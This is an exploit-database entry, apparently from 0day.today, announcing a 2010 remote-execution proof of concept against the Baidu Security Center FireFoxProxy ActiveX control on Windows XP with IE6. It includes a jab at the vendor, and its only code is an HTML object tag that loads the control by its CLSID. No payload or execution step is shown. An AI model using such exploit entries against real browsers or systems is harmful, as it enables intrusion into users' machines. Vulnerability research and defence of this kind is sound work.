id: 10109
date: 01/17/2010
title: Baidu Security Center FireFoxProxy ActiveX Remote Exec 0day POC
author: superli
cves: 

===============================================================
Baidu Security Center FireFoxProxy ActiveX Remote Exec 0day POC
===============================================================

# Exploit Title: Baidu Security Center FireFoxProxy ActiveX Remote Exec 0day POC
# Date: 2010.01.17
# Author: superli
# Software Link: http://an.baidu.com/
# Version: 2.0
# Tested on: xpsp3 ie6
# Greeting to all the guys of Baidu Security Center,please dont use Kingsoft sh*t to keep your user safe,you can use 360safe instead.I guess I will join your team and play games together one day.
# Code :
<object id=TestObj classid="CLSID:{F3BDBFB7-6D9B-40A0-BC64-3C1E2247CFA6}" style="width:100;height:350"></object>



#  0day.today [2023-03-23]  #